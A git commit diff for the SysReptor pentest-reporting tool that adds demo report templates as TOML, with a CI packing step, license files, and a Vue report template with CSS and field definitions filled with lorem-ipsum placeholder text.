Demo data archives as TOML

Michael Wedl 2024-01-16 14:13:20 +01:00
parent 093da4c484
commit 6d8970879f
96 changed files with 27909 additions and 1 deletions


@ -205,6 +205,8 @@ build-docs:
- set +e
- python3 -c 'from hooks import *; generate_software_lists()' || EXIT_CODE=$?
- set -e
# Pack demo data archives
- for archive_dir in ../demo_data/*; do reptor packarchive "$archive_dir" -o "docs/assets/${archive_dir##*/}.tar.gz"; done
# Fetch remote docs from reptor CLI
- mkdir -p docs/cli && cd docs/cli
- git init && git remote add -f origin https://github.com/Syslifters/reptor.git
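Review bot: The packing loop hands every entry matched by `../demo_data/*` to `reptor packarchive`, so a plain file in that directory (or the literal pattern, if nothing matches) would likely fail the job or publish an unexpected archive under `docs/assets/`. A guard at the top of the loop body, `[ -d "$archive_dir" ] || continue`, limits the published set to real archive directories. The `reptor` CLI that builds these published artifacts is not installed in the visible lines; if it is installed unpinned elsewhere in the job, pinning its version would keep the generated archives reproducible. The page has lost its +/- markers, so which two lines are new is inferred from the hunk header and the commit title, and the `build-docs` job starts and continues outside this hunk.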


@ -6,6 +6,7 @@
* Update build system of Vue PDF rendering script from webpack to vite
* Improve template field overview UI
* Fix error while editing ID of nested field of report section in designer
* Add demo data archives as TOML files to repository
## v2024.3 - 2024-01-09


@ -0,0 +1,106 @@
This file contains licenses of components used in the HTML/Vue template source code of designs.
vue
MIT
The MIT License (MIT)
Copyright (c) 2018-present, Yuxi (Evan) You
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
chart.js
MIT
The MIT License (MIT)
Copyright (c) 2014-2022 Chart.js Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
chartjs-plugin-datalabels
MIT
The MIT License (MIT)
Copyright (c) 2017-2021 chartjs-plugin-datalabels contributors
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
lodash
MIT
The MIT License
Copyright JS Foundation and other contributors <https://js.foundation/>
Based on Underscore.js, copyright Jeremy Ashkenas,
DocumentCloud and Investigative Reporters & Editors <http://underscorejs.org/>
This software consists of voluntary contributions made by many
individuals. For exact contribution history, see the revision history
available at https://github.com/lodash/lodash
The following license applies to all parts of this software except as
documented below:
====
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
====
Copyright and related rights for sample code are waived via CC0. Sample
code is defined as all source code displayed within the prose of the
documentation.
CC0: http://creativecommons.org/publicdomain/zero/1.0/
====
Files located in the node_modules and vendor directories are externally
maintained libraries used by this software which have their own
licenses; we recommend you read them, as their terms may differ from the
terms above.


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


@ -0,0 +1,963 @@
format = "projecttypes/v1"
id = "5d5aae0e-0027-4646-a967-f10a38f376d3"
name = "Demo Margherita v1.1"
language = "en-US"
finding_field_order = [
"title",
"cvss",
"summary",
"short_recommendation",
"affected_components",
"description",
"recommendation",
"references",
"retest_status",
"retest_notes",
]
report_template = """
<div id="header" data-sysreptor-generated="page-header">
<div id="header-left">
<div id="header-logo">
<img src="/assets/name/header-logo.png" alt="logo" />
</div>
<div id="header-title">Security Maximale</div>
</div>
<div id="header-right">
<span class="highlight">Security Maximale GmbH</span><br>
Example Street 47 | 4771 Example<br>
FN 12345 v | District Court Example<br>
</div>
</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background">
<img id="page-cover-background-img" src="/assets/name/background-26185.jpg" alt="">
</div>
<img id="page-cover-logo" src="/assets/name/logo-transparent.png" alt="">
<div id="page-cover-infobox">
<h1 id="page-cover-title">{{ report.title }}</h1>
</div>
<div id="page-cover-customer">
<p>
<strong>Customer:</strong><br>
<strong><span class="highlight">{{ report.customer }}</span></strong><br>
{{ report.report_date }}<br>
v<template v-if="report.document_history.length > 0">
{{ report.document_history[report.document_history.length - 1].version }}
</template>
<template v-else>0.0</template>
</p>
</div>
<div id="page-cover-contact">
<strong>Contact:</strong><br>
{{ report.lead_pentester.name }}<br>
{{ report.lead_pentester.phone }}<br>
<strong><a :href="'mailto:' + report.lead_pentester.email" class="highlight">{{ report.lead_pentester.email }}</a></strong>
</div>
</section>
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<section>
<h1 id="management-summary" class="in-toc">Executive Summary</h1>
<markdown :text="report.executive_summary" />
</section>
<pagebreak />
<section>
<h1 id="scope" class="in-toc">Methodology and Scope</h1>
<markdown :text="report.scope" />
</section>
<pagebreak />
<section>
<h1 id="findings-summary" class="in-toc">Vulnerability Overview</h1>
<p>
In the course of this penetration test
<comma-and-join>
<template #critical v-if="finding_stats.count_critical > 0"><strong class="risk-critical">{{ finding_stats.count_critical }} Critical</strong></template>
<template #high v-if="finding_stats.count_high > 0"><strong class="risk-high">{{ finding_stats.count_high }} High</strong></template>
<template #medium v-if="finding_stats.count_medium > 0"><strong class="risk-medium">{{ finding_stats.count_medium }} Medium</strong></template>
<template #low v-if="finding_stats.count_low > 0"><strong class="risk-low">{{ finding_stats.count_low }} Low</strong></template>
<template #info v-if="finding_stats.count_info > 0"><strong class="risk-info">{{ finding_stats.count_info }} Info</strong></template>
</comma-and-join>
vulnerabilities were identified:
</p>
<figure>
<chart :width="15" :height="10" :config="{
type: 'bar',
data: {
labels: ['Critical', 'High', 'Medium', 'Low', 'Info'],
datasets: [{
data: [
finding_stats.count_critical,
finding_stats.count_high,
finding_stats.count_medium,
finding_stats.count_low,
finding_stats.count_info
],
backgroundColor: [
cssvar('--color-risk-critical'),
cssvar('--color-risk-high'),
cssvar('--color-risk-medium'),
cssvar('--color-risk-low'),
cssvar('--color-risk-info')
],
}]
},
options: {
scales: {y: {beginAtZero: true, ticks: {precision: 0}}},
plugins: {legend: {display: false}},
}
}" />
<figcaption id="distribution-of-identified-vulnerabilities">Distribution of identified vulnerabilities</figcaption>
</figure>
<table class="finding-summary-table">
<thead>
<tr>
<th>Vulnerability</th>
<th align="center">Criticality</th>
<th v-if="report.is_retest" align="center">Remediation Status</th>
</tr>
</thead>
<tbody>
<tr v-for="finding in findings">
<td>
<ref :to="finding.id">{{ finding.title }}</ref>
</td>
<td align="center">
<ref :to="finding.id" :class="'risk-' + finding.cvss.level">{{ lodash.capitalize(finding.cvss.level) }}</ref>
</td>
<td v-if="report.is_retest" align="center">
<ref :to="finding.id" :class="'finding-status-' + finding.retest_status.value">{{ finding.retest_status.label }}</ref>
</td>
</tr>
</tbody>
</table>
</section>
<pagebreak />
<section id="findings-list">
<div v-for="(finding, findingIndex) in findings">
<h2 :id="finding.id" class="in-toc finding-title" :data-toc-title="finding.title + ' (' + capitalize(finding.cvss.level) + ')'">{{ finding.title }}</h2>
<div>
<template v-if="report.is_retest || finding.retest_status.value !== 'open'">
<strong>Remediation Status: </strong><span :class="'finding-status-' + finding.retest_status.value">{{ finding.retest_status.label }}</span><br>
</template>
<strong>Criticality: </strong><span :class="'risk-' + finding.cvss.level">{{ capitalize(finding.cvss.level) }}</span><br>
<strong>CVSS-Score: </strong>
<span :class="'risk-' + finding.cvss.level">
<a v-if="finding.cvss.vector.startsWith('CVSS:3.1')" :href="'https://www.first.org/cvss/calculator/3.1#' + finding.cvss.vector" class="link-none">{{ finding.cvss.score}}</a>
<a v-else-if="finding.cvss.vector.startsWith('CVSS:3.0')" :href="'https://www.first.org/cvss/calculator/3.0#' + finding.cvss.vector" class="link-none">{{ finding.cvss.score }}</a>
<span v-else>{{ finding.cvss.score }}</span>
</span><br>
<template v-if="finding.affected_components && finding.affected_components.length > 0">
<strong>Affects: </strong>
<markdown v-if="finding.affected_components.length == 1" :text="finding.affected_components[0]" class="markdown-inline" />
<ul v-else class="location-ul">
<li v-for="component in finding.affected_components">
<markdown :text="component" class="markdown-inline" />
</li>
</ul>
</template>
<template v-if="finding.short_recommendation">
<strong>Recommendation: </strong>
<markdown :text="finding.short_recommendation" class="markdown-inline" /><br>
</template>
</div>
<div>
<h3>Overview</h3>
<markdown :text="finding.summary" />
</div>
<div v-if="finding.retest_notes">
<h3>Remarks on Remediation Status</h3>
<markdown :text="finding.retest_notes" />
</div>
<div>
<h3 :id="finding.id + '-description'">Description</h3>
<markdown :text="finding.description" />
</div>
<div>
<h3 :id="finding.id + '-recommendation'">Recommendation</h3>
<markdown :text="finding.recommendation" />
</div>
<div v-if="finding.references && finding.references.length > 0">
<h3>Additional Information</h3>
<ul>
<li v-for="reference in finding.references">
<a :href="reference">{{ reference }}</a>
</li>
</ul>
</div>
<pagebreak />
</div>
</section>
<section>
<h1 id="document-history" class="in-toc">List of Changes</h1>
<table>
<thead>
<tr>
<th align="center">Version</th>
<th align="center">Date</th>
<th>Description</th>
<th>Author</th>
</tr>
</thead>
<tbody>
<tr v-for="item in report.document_history">
<td align="center">{{ item.version }}</td>
<td align="center">{{ item.date }}</td>
<td>{{ item.description }}</td>
<td>
<comma-and-join>
<template v-for="author in item.authors" #[author]>{{ author }}</template>
</comma-and-join>
</td>
</tr>
</tbody>
</table>
</section>
<markdown>
# Disclaimer {#disclaimer .in-toc}
Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet.
</markdown>
<markdown>
# Imprint {#imprint .in-toc}
Security Maximale GmbH<br>
Example Street 47 | 4711 Example<br>
FN 12345 v | District Court Example<br>
</markdown>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-status-open: #E83221;
--color-status-partial: #FF9300;
--color-status-resolved: #00AE51;
--color-status-accepted: #00AE51;
--color-status-changed: #4285F5;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 11pt;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.status-open { color: var(--color-status-open) !important; font-weight: bold; }
.status-partial { color: var(--color-status-partial) !important; font-weight: bold; }
.status-resolved { color: var(--color-status-resolved) !important; font-weight: bold; }
.status-accepted { color: var(--color-status-accepted) !important; font-weight: bold; }
.status-changed { color: var(--color-status-changed) !important; font-weight: bold; }
/* PDF-specific global styles */
@page {
size: A4 portrait;
margin: 35mm 26mm 26mm 26mm;
}
a {
color: inherit;
text-decoration: none;
}
pre code {
background-color: whitesmoke;
padding: 0.2em !important;
}
/* helper classes */
.location-ul {
margin: 0px;
margin-bottom:0.2em;
}
.highlight {
color: #303840;
}
/* #region header */
@page {
margin-top: 35mm;
--header-background-color: #ABABAB;
--header-margin-bottom: 5mm;
@top-left-corner {
content: "";
background-color: var(--header-background-color);
margin-bottom: var(--header-margin-bottom);
}
@top-left {
content: element(header-left);
background-color: var(--header-background-color);
margin-bottom: var(--header-margin-bottom);
width: 51%;
margin-left: -1px;
margin-right: -1px;
}
@top-right {
content: element(header-right);
background-color: var(--header-background-color);
margin-bottom: var(--header-margin-bottom);
width: 51%;
margin-left: -1px;
margin-right: -1px;
}
@top-right-corner {
content: "";
background-color: var(--header-background-color);
margin-bottom: var(--header-margin-bottom);
}
}
#header #header-left { position: running(header-left); }
#header #header-logo {
display: inline-block;
height: 100%;
width: 20mm;
}
#header #header-logo img {
width: 100%;
height: auto;
}
#header #header-title {
position: absolute;
top: 8mm;
left: 25mm;
color: #303840;
font-size: 16pt;
font-weight: bold;
}
#header #header-right {
position: running(header-right);
text-align: right;
color: white;
font-size: 9pt;
}
/* #endregion header */
/* #region footer */
@page {
@bottom-right-corner {
/* Page number */
content: counter(page) " / " counter(pages);
font-size: 9pt;
}
}
/* #endregion footer */
/* #region page-cover */
#page-cover {
margin: -35mm -26mm 10mm -26mm;
}
@page :first {
/* Hide header */
@top-left-corner { content: none !important; }
@top-left { content: none !important; }
@top-center { content: none !important; }
@top-right { content: none !important; }
@top-right-corner { content: none !important; }
/* Hide footer */
@bottom-left-corner { content: none !important; }
@bottom-left { content: none !important; }
@bottom-center { content: none !important; }
@bottom-right { content: none !important; }
@bottom-right-corner { content: none !important; }
}
#page-cover-background {
width: 100%;
height: 120mm;
overflow: hidden;
background-color: black;
}
#page-cover-background-img {
width: 100%;
transform: scale(1.16) translateY(-11%);
opacity: 0.7;
}
#page-cover-logo {
position: absolute;
top: -30mm;
left: -7mm;
width: 50%;
}
#page-cover-logo-text {
position: absolute;
top: -12mm;
left: 4mm;
color: #ffffff;
}
#page-cover-infobox {
position: absolute;
top: 30mm;
left: -1mm;
width: 150mm;
color: #ffffff;
}
#page-cover-title {
font-size: 18pt;
font-weight: normal;
margin-top: 0;
margin-bottom: 0.3em;
}
#page-cover-customer {
position: absolute;
top: 43mm;
left: -1mm;
width: 150mm;
color: #ffffff;
}
#page-cover-contact {
position: absolute;
top: 46mm;
right: 4mm;
text-align: right;
color: #ffffff;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(" ") " " target-counter(attr(href), page);
font-weight: normal;
}
#toc .toc-level1 {
padding-left: 0;
margin-top: 0.7rem;
font-weight: bold;
}
#toc .toc-level2 {
padding-left: 1.5rem;
margin-top: 0.35rem;
font-weight: normal;
}
#toc .toc-level3 {
padding-left: 3rem;
margin-top: 0.25rem;
font-weight: normal;
}
#toc .toc-level4 {
padding-left: 4.5rem;
margin-top: 0;
font-weight: normal;
}
/* #endregion toc */
/* #region findings-list */
#findings-list {
counter-reset: finding-counter;
}
#findings-list .finding-title::before {
counter-increment: finding-counter;
content: counter(finding-counter) ". ";
}
#findings-list .markdown h1 {
font-size: 13pt;
font-weight: bold;
}
#findings-list .markdown h2 {
font-size: 12pt;
font-weight: bold;
}
#findings-list .markdown h3 {
font-size: 11pt;
font-weight: bold;
}
/* #endregion findings-list */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "TODO report title"
required = true
spellcheck = true
[report_fields.scope]
type = "markdown"
label = "Scope"
origin = "custom"
default = """
**TODO scope**
Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.
* Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.
* Nam liber tempor cum soluta nobis eleifend option congue nihil imperdiet doming id quod mazim placerat facer possim assum. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.
* Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis.
At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, At accusam aliquyam diam diam dolore dolores duo eirmod eos erat, et nonumy sed tempor et et invidunt justo labore Stet clita ea et gubergren, kasd magna no rebum. sanctus sea sed takimata ut vero voluptua. est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur
"""
required = true
[report_fields.customer]
type = "string"
label = "Customer"
origin = "custom"
default = "TODO customer"
required = true
spellcheck = false
[report_fields.duration]
type = "string"
label = "Duration"
origin = "custom"
default = "TODO person days"
required = true
spellcheck = false
[report_fields.end_date]
type = "date"
label = "Pentest End Date"
origin = "custom"
required = true
[report_fields.is_retest]
type = "boolean"
label = "Is Retest"
origin = "predefined"
[report_fields.start_date]
type = "date"
label = "Pentest Start Date"
origin = "custom"
required = true
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.lead_pentester]
type = "object"
label = "Lead Pentester"
origin = "custom"
[report_fields.lead_pentester.properties]
[report_fields.lead_pentester.properties.name]
type = "string"
label = "Name"
origin = "custom"
default = "TODO name"
required = true
spellcheck = false
[report_fields.lead_pentester.properties.email]
type = "string"
label = "Email"
origin = "custom"
default = "TODO email"
required = true
spellcheck = false
[report_fields.lead_pentester.properties.phone]
type = "string"
label = "Phone Number"
origin = "custom"
default = "TODO phone"
required = true
spellcheck = false
[report_fields.document_history]
type = "list"
label = "Document History"
origin = "custom"
required = true
[report_fields.document_history.items]
type = "object"
label = ""
origin = "custom"
[report_fields.document_history.items.properties]
[report_fields.document_history.items.properties.description]
type = "string"
label = "Description"
origin = "custom"
default = "TODO description"
required = true
spellcheck = false
[report_fields.document_history.items.properties.date]
type = "date"
label = "Date"
origin = "custom"
required = true
[report_fields.document_history.items.properties.authors]
type = "list"
label = "Authors"
origin = "custom"
required = true
[report_fields.document_history.items.properties.authors.items]
type = "string"
label = ""
origin = "custom"
default = "TODO author"
required = true
spellcheck = false
[report_fields.document_history.items.properties.version]
type = "string"
label = "Version"
origin = "custom"
default = "TODO version"
required = true
spellcheck = false
[report_fields.executive_summary]
type = "markdown"
label = "Executive Summary"
origin = "custom"
default = """
**TODO summary**
Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet.
Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.
Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse
"""
required = true
[[report_sections]]
id = "executive_summary"
label = "Executive Summary"
fields = [
"executive_summary",
]
[[report_sections]]
id = "scope"
label = "Scope"
fields = [
"scope",
"duration",
"start_date",
"end_date",
]
[[report_sections]]
id = "customer"
label = "Customer"
fields = [
"customer",
]
[[report_sections]]
id = "other"
label = "Other"
fields = [
"title",
"report_date",
"lead_pentester",
"document_history",
"is_retest",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "TODO: New Finding"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS"
origin = "core"
default = "n/a"
required = true
[finding_fields.summary]
type = "markdown"
label = "Summary"
origin = "predefined"
default = "TODO summary"
required = true
[finding_fields.description]
type = "markdown"
label = "Technical Description"
origin = "predefined"
default = "TODO description"
required = true
[finding_fields.recommendation]
type = "markdown"
label = "Recommendation"
origin = "predefined"
default = "TODO recommendation"
required = true
[finding_fields.references]
type = "list"
label = "References"
origin = "predefined"
required = false
[finding_fields.references.items]
type = "string"
label = ""
origin = "predefined"
required = true
spellcheck = false
[finding_fields.retest_notes]
type = "markdown"
label = "Re-test Notes"
origin = "predefined"
required = false
[finding_fields.retest_status]
type = "enum"
label = "Re-test Status"
origin = "predefined"
required = false
[[finding_fields.retest_status.choices]]
label = "Open"
value = "open"
[[finding_fields.retest_status.choices]]
label = "Resolved"
value = "resolved"
[[finding_fields.retest_status.choices]]
label = "Partially Resolved"
value = "partial"
[[finding_fields.retest_status.choices]]
label = "Changed"
value = "changed"
[[finding_fields.retest_status.choices]]
label = "Accepted"
value = "accepted"
[finding_fields.affected_components]
type = "list"
label = "Affected Components"
origin = "predefined"
required = true
[finding_fields.affected_components.items]
type = "string"
label = "Component"
origin = "predefined"
default = "TODO affected component"
required = true
spellcheck = false
[finding_fields.short_recommendation]
type = "string"
label = "Short Recommendation"
origin = "predefined"
required = true
spellcheck = true
[report_preview_data]
[report_preview_data.report]
title = "Example Web-App"
scope = """
Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.
* Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.
* Nam liber tempor cum soluta nobis eleifend option congue nihil imperdiet doming id quod mazim placerat facer possim assum. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.
* Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis.
At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, At accusam aliquyam diam diam dolore dolores duo eirmod eos erat, et nonumy sed tempor et et invidunt justo labore Stet clita ea et gubergren, kasd magna no rebum. sanctus sea sed takimata ut vero voluptua. est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur
"""
customer = "Example Customer"
duration = "TODO person days"
end_date = "2022-07-08"
is_retest = true
start_date = "2022-07-08"
report_date = "2022-07-08"
executive_summary = """
